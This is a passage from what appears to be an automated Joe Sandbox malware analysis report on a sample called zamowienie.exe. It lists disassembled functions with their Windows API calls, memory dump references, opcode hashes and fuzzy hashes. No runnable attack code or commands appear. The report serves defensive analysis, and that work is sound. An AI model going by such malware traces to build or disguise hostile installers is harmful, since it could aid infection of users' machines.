                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 3e41ba515afca3f1236dcbdd5ecaa7d7c9f36d209571132ddb966e5623deb938
                                                                                                                                              • Instruction ID: e6584aa6c1e8110f4d7d4fb369e856e3f876d99531050c96095b27858257d57a
                                                                                                                                              • Opcode Fuzzy Hash: 3e41ba515afca3f1236dcbdd5ecaa7d7c9f36d209571132ddb966e5623deb938
                                                                                                                                              • Instruction Fuzzy Hash: D8E0EC3225025AEBDF109E65DC00EEB7B6CFF053A0F004836F915E2590D635E821EBA5
                                                                                                                                              Function 00405FF8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,0040C55F,0040B8F8,0040342A,0040B8F8,0040C55F,004138F8,00004000,?,00000000,00403254,00000004), ref: 0040600C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                                                                                              • Instruction ID: 5f15da16f47e3d0b3424efdc061412c1755132178ccec5a184b7774e2c201818
                                                                                                                                              • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                                                                                              • Instruction Fuzzy Hash: 41E0EC3265025EABDF50DEA59D00FEB7BACEF05360F014837F916E2150DA31E92197A9
                                                                                                                                              Function 734029B1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(7340504C,?,?,7340503C), ref: 734029CF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 04134a1810c7d196c4b14d9b725d110593fbbee109d3b0d8feb44ad172d3d206
                                                                                                                                              • Instruction ID: 28f896d8af99b9b46d450ba057e6f4609a06c5ee5ac6f96d7f335b476a4a1399
                                                                                                                                              • Opcode Fuzzy Hash: 04134a1810c7d196c4b14d9b725d110593fbbee109d3b0d8feb44ad172d3d206
                                                                                                                                              • Instruction Fuzzy Hash: BDF0ACF2709240DED368FF2A874470D3BE4F715359B20A5EAE55CF6242E33444448F95
                                                                                                                                              Function 00406244 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,00420130,?,?,004062D2,00420130,?,?,?,00000000,?), ref: 00406268
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction ID: 5e79517f93acea60e94468e22b7d2b32b801509e0d2350c66bac6f24a6bb699c
                                                                                                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction Fuzzy Hash: BCD0123210420DBBDF116E90DD01FAB3B1EAB08310F01442AFE16A4091D776D534A754
                                                                                                                                              Function 004015C2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015CD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                                              • Instruction ID: 22c1aa84a1f1daebfb6059ce5be08a21359d6724d85e2e0e533240bbdcf4b3d7
                                                                                                                                              • Opcode Fuzzy Hash: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                                              • Instruction Fuzzy Hash: B4D01232704214DBDF60DBE49F0869E7364EB50325B204137D111F21D1D6B9C5529B1D
                                                                                                                                              Function 00404493 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                                              • Instruction ID: 95ec8208bb9d3a01d591897c0f28f5e1a7c334172ea667dd54b0e9ef813c1122
                                                                                                                                              • Opcode Fuzzy Hash: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                                              • Instruction Fuzzy Hash: 8DB01279381701BBDE619B40DF09F857E62E7A4B01F018038B344240F0CAB200A1DB1C
                                                                                                                                              Function 00405A9A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ShellExecuteExA.SHELL32(?,004048A5,?), ref: 00405AA9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 587946157-0
                                                                                                                                              • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                              • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                                                              • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                              • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                                                              Function 004034A9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                                              • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                                                                                                              • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                                              • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                                                                                                              Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                                • Part of subcall function 00405A57: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,00426800,00426800,00426800,?,948,00000000), ref: 00405A80
                                                                                                                                                • Part of subcall function 00405A57: CloseHandle.KERNEL32(?), ref: 00405A8D
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                                                                                                                                • Part of subcall function 0040685B: WaitForSingleObject.KERNEL32(?,?), ref: 0040686C
                                                                                                                                                • Part of subcall function 0040685B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040688E
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: 336fd67ccc8e735512a1efe94d0d3fa4335e613bb5c76ac875107bd3aece32d2
                                                                                                                                              • Instruction ID: 6326f8cf37e97362563a4a525c4747758c0656ae9550c1d9405d456246959b30
                                                                                                                                              • Opcode Fuzzy Hash: 336fd67ccc8e735512a1efe94d0d3fa4335e613bb5c76ac875107bd3aece32d2
                                                                                                                                              • Instruction Fuzzy Hash: C3F03032A051219BCF20BBA58D899EF62A4DB41318B11813FE512B21D1C77C4A469EAE

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00405640 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040569F
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004056AE
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004056EB
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004056F2
                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405713
                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405724
                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405737
                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405745
                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405758
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040577A
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 0040578E
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004057AF
                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004057BF
                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004057D8
                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004057E4
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004056BD
                                                                                                                                                • Part of subcall function 00404493: SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405800
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000055D4,00000000), ref: 0040580E
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405815
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405838
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 0040583F
                                                                                                                                              • ShowWindow.USER32(?), ref: 00405885
                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004058B9
                                                                                                                                              • CreatePopupMenu.USER32 ref: 004058CA
                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004058DF
                                                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 004058FF
                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405918
                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405954
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405964
                                                                                                                                              • EmptyClipboard.USER32 ref: 0040596A
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405973
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040597D
                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405991
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004059AA
                                                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 004059B5
                                                                                                                                              • CloseClipboard.USER32 ref: 004059BB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: PB
                                                                                                                                              • API String ID: 590372296-3672992855
                                                                                                                                              • Opcode ID: 9ece42787bb4c3c3e099679d76c11b7cb09ab47a378a4b394defb0c137757d26
                                                                                                                                              • Instruction ID: fd6102db3f661a96db88c4cff4165c9fe2bd5cf480e5840d44d2693fce9adf5f
                                                                                                                                              • Opcode Fuzzy Hash: 9ece42787bb4c3c3e099679d76c11b7cb09ab47a378a4b394defb0c137757d26
                                                                                                                                              • Instruction Fuzzy Hash: F2A14AB1A00208FFDB11AFA0DE85AAE7F79EB08355F10403AFA44B61A1C7754E51DF68
                                                                                                                                              Function 004048F0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040493F
                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404969
                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041FD28,?), ref: 00404A1A
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404A25
                                                                                                                                              • lstrcmpiA.KERNEL32(Call,00420950), ref: 00404A57
                                                                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 00404A63
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404A75
                                                                                                                                                • Part of subcall function 00405AB8: GetDlgItemTextA.USER32(?,?,00000400,00404AAC), ref: 00405ACB
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,*?|<>/":,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406710
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,?,?,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 0040671D
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406722
                                                                                                                                                • Part of subcall function 004066B8: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406732
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041F920,?,?,0000040F,?,0041F920,0041F920,?,?,0041F920,?,?,000003FB,?), ref: 00404B33
                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404B4E
                                                                                                                                                • Part of subcall function 00404CA7: lstrlenA.KERNEL32(00420950,00420950,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404BC2,000000DF,00000000,00000400,?), ref: 00404D45
                                                                                                                                                • Part of subcall function 00404CA7: wsprintfA.USER32 ref: 00404D4D
                                                                                                                                                • Part of subcall function 00404CA7: SetDlgItemTextA.USER32(?,00420950), ref: 00404D60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: A$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$Call$PB
                                                                                                                                              • API String ID: 2624150263-3707865174
                                                                                                                                              • Opcode ID: dc3a5bef0da5bcdd42e5caf87009513b1d7617797e8e1c3746d9564e8cea5adf
                                                                                                                                              • Instruction ID: e3545aa31a324473be50b27f7f7490420232d739f89f18fc579bf95e57ac48cb
                                                                                                                                              • Opcode Fuzzy Hash: dc3a5bef0da5bcdd42e5caf87009513b1d7617797e8e1c3746d9564e8cea5adf
